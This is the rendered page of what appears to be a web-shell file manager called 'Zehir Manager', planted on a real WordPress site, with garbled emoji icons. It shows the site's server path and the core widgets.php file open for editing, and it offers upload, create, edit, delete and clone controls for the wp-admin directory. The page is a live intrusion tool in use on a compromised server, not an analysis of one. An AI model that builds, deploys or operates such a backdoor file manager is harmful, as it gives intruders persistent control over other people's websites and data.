π«οΈ Zehir Manager
π
Current location:
home
/
ithome
/
public_html
/
superbrands.hr
/
wp-admin
/
Clone
Create Clone
β¬οΈ
Γst Dizine Git
βοΈ Editing: widgets.php
<?php /** * Widget administration screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; /** WordPress Administration Widgets API */ require_once ABSPATH . 'wp-admin/includes/widgets.php'; if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to edit theme options on this site.' ) . '</p>', 403 ); } if ( ! current_theme_supports( 'widgets' ) ) { wp_die( __( 'The theme you are currently using is not widget-aware, meaning that it has no sidebars that you are able to change. For information on making your theme widget-aware, please <a href="https://developer.wordpress.org/themes/functionality/widgets/">follow these instructions</a>.' ) ); } // Used in the HTML title tag. $title = __( 'Widgets' ); $parent_file = 'themes.php'; if ( wp_use_widgets_block_editor() ) { require ABSPATH . 'wp-admin/widgets-form-blocks.php'; } else { require ABSPATH . 'wp-admin/widgets-form.php'; }
πΎ Save File
π οΈ Management Tools
π€ Upload File:
π Upload
ποΈ Create Folder:
π Create
π Create File:
π Create
π Contents of current directory:
π
css
|
β Remove
π
images
|
β Remove
π
includes
|
β Remove
π
js
|
β Remove
π
maint
|
β Remove
π
network
|
β Remove
π
user
|
β Remove
π
about.php
|
βοΈ Edit
|
β Remove
π
admin-ajax.php
|
βοΈ Edit
|
β Remove
π
admin-footer.php
|
βοΈ Edit
|
β Remove
π
admin-functions.php
|
βοΈ Edit
|
β Remove
π
admin-header.php
|
βοΈ Edit
|
β Remove
π
admin-post.php
|
βοΈ Edit
|
β Remove
π
admin.php
|
βοΈ Edit
|
β Remove
π
authorize-application.php
|
βοΈ Edit
|
β Remove
π
comment.php
|
βοΈ Edit
|
β Remove
π
contribute.php
|
βοΈ Edit
|
β Remove
π
credits.php
|
βοΈ Edit
|
β Remove
π
custom-background.php
|
βοΈ Edit
|
β Remove
π
custom-header.php
|
βοΈ Edit
|
β Remove
π
customize.php
|
βοΈ Edit
|
β Remove
π
edit-comments.php
|
βοΈ Edit
|
β Remove
π
edit-form-advanced.php
|
βοΈ Edit
|
β Remove
π
edit-form-blocks.php
|
βοΈ Edit
|
β Remove
π
edit-form-comment.php
|
βοΈ Edit
|
β Remove
π
edit-tag-form.php
|
βοΈ Edit
|
β Remove
π
edit-tags.php
|
βοΈ Edit
|
β Remove
π
edit.php
|
βοΈ Edit
|
β Remove
π
erase-personal-data.php
|
βοΈ Edit
|
β Remove
π
export-personal-data.php
|
βοΈ Edit
|
β Remove
π
export.php
|
βοΈ Edit
|
β Remove
π
freedoms.php
|
βοΈ Edit
|
β Remove
π
import.php
|
βοΈ Edit
|
β Remove
π
index.php
|
βοΈ Edit
|
β Remove
π
install-helper.php
|
βοΈ Edit
|
β Remove
π
link-add.php
|
βοΈ Edit
|
β Remove
π
link-manager.php
|
βοΈ Edit
|
β Remove
π
link-parse-opml.php
|
βοΈ Edit
|
β Remove
π
link.php
|
βοΈ Edit
|
β Remove
π
load-styles.php
|
βοΈ Edit
|
β Remove
π
media-new.php
|
βοΈ Edit
|
β Remove
π
media-upload.php
|
βοΈ Edit
|
β Remove
π
media.php
|
βοΈ Edit
|
β Remove
π
menu.php
|
βοΈ Edit
|
β Remove
π
moderation.php
|
βοΈ Edit
|
β Remove
π
ms-admin.php
|
βοΈ Edit
|
β Remove
π
ms-delete-site.php
|
βοΈ Edit
|
β Remove
π
ms-edit.php
|
βοΈ Edit
|
β Remove
π
ms-options.php
|
βοΈ Edit
|
β Remove
π
ms-sites.php
|
βοΈ Edit
|
β Remove
π
ms-themes.php
|
βοΈ Edit
|
β Remove
π
ms-upgrade-network.php
|
βοΈ Edit
|
β Remove
π
ms-users.php
|
βοΈ Edit
|
β Remove
π
my-sites.php
|
βοΈ Edit
|
β Remove
π
nav-menus.php
|
βοΈ Edit
|
β Remove
π
network.php
|
βοΈ Edit
|
β Remove
π
options-discussion.php
|
βοΈ Edit
|
β Remove
π
options-general.php
|
βοΈ Edit
|
β Remove
π
options-head.php
|
βοΈ Edit
|
β Remove
π
options-media.php
|
βοΈ Edit
|
β Remove
π
options-permalink.php
|
βοΈ Edit
|
β Remove
π
options-privacy.php
|
βοΈ Edit
|
β Remove
π
options-reading.php
|
βοΈ Edit
|
β Remove
π
options-writing.php
|
βοΈ Edit
|
β Remove
π
options.php
|
βοΈ Edit
|
β Remove
π
plugin-install.php
|
βοΈ Edit
|
β Remove
π
plugins.php
|
βοΈ Edit
|
β Remove
π
post-new.php
|
βοΈ Edit
|
β Remove
π
post.php
|
βοΈ Edit
|
β Remove
π
press-this.php
|
βοΈ Edit
|
β Remove
π
privacy-policy-guide.php
|
βοΈ Edit
|
β Remove
π
privacy.php
|
βοΈ Edit
|
β Remove
π
profile.php
|
βοΈ Edit
|
β Remove
π
revision.php
|
βοΈ Edit
|
β Remove
π
site-editor.php
|
βοΈ Edit
|
β Remove
π
site-health-info.php
|
βοΈ Edit
|
β Remove
π
site-health.php
|
βοΈ Edit
|
β Remove
π
theme-editor.php
|
βοΈ Edit
|
β Remove
π
theme-install.php
|
βοΈ Edit
|
β Remove
π
themes.php
|
βοΈ Edit
|
β Remove
π
tools.php
|
βοΈ Edit
|
β Remove
π
update-core.php
|
βοΈ Edit
|
β Remove
π
update.php
|
βοΈ Edit
|
β Remove
π
upgrade-functions.php
|
βοΈ Edit
|
β Remove
π
upgrade.php
|
βοΈ Edit
|
β Remove
π
upload.php
|
βοΈ Edit
|
β Remove
π
user-edit.php
|
βοΈ Edit
|
β Remove
π
user-new.php
|
βοΈ Edit
|
β Remove
π
users.php
|
βοΈ Edit
|
β Remove
π
widgets-form-blocks.php
|
βοΈ Edit
|
β Remove
π
widgets-form.php
|
βοΈ Edit
|
β Remove
π
widgets.php
|
βοΈ Edit
|
β Remove